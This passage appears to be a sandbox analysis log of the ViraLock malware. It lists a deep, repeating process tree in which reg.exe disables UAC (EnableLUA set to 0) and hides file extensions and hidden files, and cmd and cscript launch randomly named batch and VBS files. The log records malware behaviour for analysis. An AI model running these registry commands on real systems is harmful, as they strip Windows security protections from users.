        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        87⤵
        UAC bypass
        
        PID:24604
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iMQgsQcQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        87⤵
        
        PID:24584
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        88⤵
        
        PID:24480
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        85⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:23964
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        85⤵
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:24064
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        85⤵
        UAC bypass
        
        PID:24096
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IIIAYAkE.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        85⤵
        
        PID:24148
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        86⤵
        System Location Discovery: System Language Discovery
        
        PID:24544
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        83⤵
        Modifies visibility of file extensions in Explorer
        
        PID:22460
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        83⤵
        
        PID:22496
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        83⤵
        UAC bypass
        
        PID:22504
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hSksossk.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        83⤵
        
        PID:22556
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        84⤵
        
        PID:23972
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        81⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:21460
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        81⤵
        
        PID:21476
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        81⤵
        UAC bypass
        Modifies registry key
        
        PID:21532
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\IeMsEQco.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        81⤵
        
        PID:21576
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        82⤵
        
        PID:21812
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        79⤵
        Modifies visibility of file extensions in Explorer
        
        PID:20600
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        79⤵
        Modifies registry key
        
        PID:20612
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        79⤵
        UAC bypass
        Modifies registry key
        
        PID:20636
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\YKgkQsgs.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        79⤵
        System Location Discovery: System Language Discovery
        
        PID:20664
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        80⤵
        
        PID:21228
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        77⤵
        Modifies visibility of file extensions in Explorer
        
        PID:19588
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        77⤵
        
        PID:19540
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        77⤵
        UAC bypass
        
        PID:19524
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UScgQQsQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        77⤵
        
        PID:20048
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        78⤵
        
        PID:20380
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        75⤵
        Modifies visibility of file extensions in Explorer
        
        PID:24004
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        75⤵
        
        PID:24020
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        75⤵
        UAC bypass
        
        PID:24036
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kEkEAEwE.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        75⤵
        
        PID:24208
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        76⤵
        
        PID:21488
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        73⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:10284
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        73⤵
        
        PID:16192
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        73⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        
        PID:1408
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sOgooIMk.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        73⤵
        
        PID:22972
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        74⤵
        
        PID:23384
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        71⤵
        Modifies visibility of file extensions in Explorer
        
        PID:20800
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        71⤵
        Modifies registry key
        
        PID:20828
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        71⤵
        UAC bypass
        Modifies registry key
        
        PID:20912
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tIUgIUYo.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        71⤵
        
        PID:21052
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        72⤵
        
        PID:9668
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        69⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:12828
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        69⤵
        Modifies registry key
        
        PID:12628
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        69⤵
        UAC bypass
        Modifies registry key
        
        PID:12208
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\oQoUkQwk.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        69⤵
        
        PID:12088
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        70⤵
        
        PID:19896
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        67⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:6148
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        67⤵
        
        PID:11108
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        67⤵
        UAC bypass
        
        PID:16856
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iggEQYQE.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        67⤵
        
        PID:17296
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        68⤵
        System Location Discovery: System Language Discovery
        
        PID:8876
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        65⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:10532
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        65⤵
        Modifies registry key
        
        PID:10712
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        65⤵
        UAC bypass
        
        PID:13364
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\DQMMkksw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        65⤵
        
        PID:15720
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        66⤵
        
        PID:24760
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        63⤵
        Modifies visibility of file extensions in Explorer
        
        PID:11332
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        63⤵
        Modifies registry key
        
        PID:16276
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        63⤵
        UAC bypass
        
        PID:16372
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KsMMwMwU.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        63⤵
        System Location Discovery: System Language Discovery
        
        PID:6664
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        64⤵
        
        PID:23624
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        61⤵
        Modifies visibility of file extensions in Explorer
        
        PID:7528
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        61⤵
        System Location Discovery: System Language Discovery
        
        PID:10180
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        61⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        
        PID:11364
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\KYIoskAA.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        61⤵
        
        PID:10340
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        62⤵
        
        PID:19848
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        59⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:15008
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        59⤵
        
        PID:19552
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        59⤵
        UAC bypass
        
        PID:19752
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AqMosYIE.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        59⤵
        
        PID:7892
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        60⤵
        
        PID:8924
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        57⤵
        Modifies visibility of file extensions in Explorer
        
        PID:14100
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        57⤵
        Modifies registry key
        
        PID:13760
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        57⤵
        UAC bypass
        Modifies registry key
        
        PID:14196
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BIEMEYQs.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        57⤵
        
        PID:13632
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        58⤵
        System Location Discovery: System Language Discovery
        
        PID:10892
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        55⤵
        Modifies visibility of file extensions in Explorer
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:13656
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        55⤵
        
        PID:13552
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        55⤵
        UAC bypass
        
        PID:13932
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\fCwgEAYw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        55⤵
        
        PID:14220
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        56⤵
        
        PID:15576
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        53⤵
        Modifies visibility of file extensions in Explorer
        
        PID:22032
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        53⤵
        
        PID:13972
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        53⤵
        UAC bypass
        
        PID:8828
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GkYEQsoA.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        53⤵
        
        PID:13568
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        54⤵
        
        PID:12960
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        51⤵
        Modifies visibility of file extensions in Explorer
        
        PID:13332
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        51⤵
        Modifies registry key
        
        PID:13424
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        51⤵
        UAC bypass
        
        PID:13460
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\LMAcEQcA.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        51⤵
        
        PID:13776
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        52⤵
        
        PID:15328
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        49⤵
        Modifies visibility of file extensions in Explorer
        
        PID:19404
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        49⤵
        
        PID:9028
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        49⤵
        UAC bypass
        
        PID:11324
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zIkMgYcM.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        49⤵
        
        PID:14104
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        50⤵
        
        PID:12904
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        47⤵
        Modifies visibility of file extensions in Explorer
        
        PID:17128
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        47⤵
        
        PID:17224
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        47⤵
        UAC bypass
        System Location Discovery: System Language Discovery
        Modifies registry key
        
        PID:17376
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MEUUAkYU.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        47⤵
        
        PID:17448
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        48⤵
        
        PID:18812
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        45⤵
        Modifies visibility of file extensions in Explorer
        
        PID:11500
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        45⤵
        Modifies registry key
        
        PID:7160
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        45⤵
        UAC bypass
        
        PID:9620
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\NOMoUMYM.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        45⤵
        
        PID:22892
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        46⤵
        
        PID:11720
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        43⤵
        Modifies visibility of file extensions in Explorer
        
        PID:13280
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        43⤵
        System Location Discovery: System Language Discovery
        
        PID:8528
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        43⤵
        UAC bypass
        
        PID:12344
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\OigAocEU.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        43⤵
        
        PID:12544
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        44⤵
        
        PID:10164
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        41⤵
        Modifies visibility of file extensions in Explorer
        
        PID:14020
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        41⤵
        
        PID:13884
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        41⤵
        UAC bypass
        
        PID:13916
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ossYAwMQ.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        41⤵
        
        PID:22256
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        42⤵
        System Location Discovery: System Language Discovery
        
        PID:12132
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        39⤵
        Modifies visibility of file extensions in Explorer
        
        PID:19212
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        39⤵
        Modifies registry key
        
        PID:19172
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        39⤵
        UAC bypass
        Modifies registry key
        
        PID:19120
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\jgIAIAoE.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        39⤵
        
        PID:19024
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        40⤵
        System Location Discovery: System Language Discovery
        
        PID:17672
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        37⤵
        Modifies visibility of file extensions in Explorer
        System Location Discovery: System Language Discovery
        
        PID:13612
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        37⤵
        
        PID:13584
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        37⤵
        UAC bypass
        
        PID:13500
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EIkwYAQU.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        37⤵
        
        PID:13456
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        38⤵
        
        PID:16452
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        35⤵
        Modifies visibility of file extensions in Explorer
        Modifies registry key
        
        PID:11952
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        35⤵
        Modifies registry key
        
        PID:7744
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        35⤵
        UAC bypass
        Modifies registry key
        
        PID:14436
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZUEggsIw.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        35⤵
        
        PID:14692
        
        C:\Windows\SysWOW64\cscript.exe
        
        cscript C:\Users\Admin\AppData\Local\Temp/file.vbs
        36⤵
        
        PID:13140
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1
        33⤵
        Modifies visibility of file extensions in Explorer
        
        PID:19236
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2
        33⤵
        Modifies registry key
        
        PID:19204
        
        C:\Windows\SysWOW64\reg.exe
        
        reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f
        33⤵
        UAC bypass
        
        PID:19168
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\sEwwcsMM.bat" "C:\Users\Admin\Downloads\ViraLock.exe""
        33⤵
        
        PID:19372
        
